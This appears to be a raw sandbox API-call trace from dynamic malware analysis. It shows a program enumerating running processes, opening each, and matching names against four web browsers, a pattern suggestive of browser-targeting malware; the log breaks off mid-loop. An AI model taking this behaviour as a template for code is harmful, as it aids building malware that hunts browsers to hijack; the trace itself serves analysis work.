	[0255.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xae68
	[0255.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.192] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0255.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.193] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.193] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0255.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.193] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.193] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0255.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xae6c
	[0255.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.194] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0255.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.195] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.195] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0255.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.195] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.196] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0255.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xae70
	[0255.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.196] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0255.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.197] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.197] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0255.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.197] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.198] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0255.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xae74
	[0255.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.198] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0255.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.199] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.199] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0255.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.199] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.199] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xae78
	[0255.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.200] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.201] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.201] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.201] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.202] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xae7c
	[0255.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.202] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.203] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.203] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.203] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.204] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.204] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xae80
	[0255.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.205] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.205] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.205] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.205] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.206] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xae84
	[0255.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.207] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.207] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.207] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.208] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.208] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.208] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xae88
	[0255.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.209] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.209] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.209] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.210] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.210] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xae8c
	[0255.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.211] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.211] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.211] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.212] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.212] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.212] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xae90
	[0255.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.213] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.213] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.213] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.214] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.214] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0255.215] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xae94
	[0255.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.215] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0255.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.215] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.215] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0255.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.216] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.216] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.222] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xae98
	[0255.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.227] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.228] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.229] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.229] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.229] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0255.230] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xae9c
	[0255.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.230] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.231] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.231] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.231] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.231] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0255.232] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xaea0
	[0255.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.232] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0255.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.233] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.233] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0255.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.233] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.234] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.234] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xaea4
	[0255.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.234] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.235] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.235] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.236] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.236] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0255.237] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xaea8
	[0255.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.237] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0255.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.238] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.238] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0255.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.239] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.239] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0255.240] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xaeac
	[0255.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.240] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0255.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.240] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.241] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0255.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.241] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.241] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0255.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xaeb0
	[0255.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.242] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0255.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.242] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.243] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0255.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.243] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.243] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0255.244] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xaeb4
	[0255.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.244] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0255.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.244] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.245] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0255.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.245] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.245] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0255.246] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0255.246] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0255.247] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xaeb8
	[0255.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.247] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0255.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.247] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.248] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0255.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.249] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.249] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0255.250] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xaebc
	[0255.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.250] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0255.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.250] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.250] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0255.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.251] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.251] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0255.252] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xaec0
	[0255.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.252] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0255.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.252] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.253] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0255.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.253] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.253] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0255.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xaec4
	[0255.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.254] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0255.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.255] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.255] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0255.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.256] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.256] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0255.256] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xaec8
	[0255.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.257] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0255.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.257] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
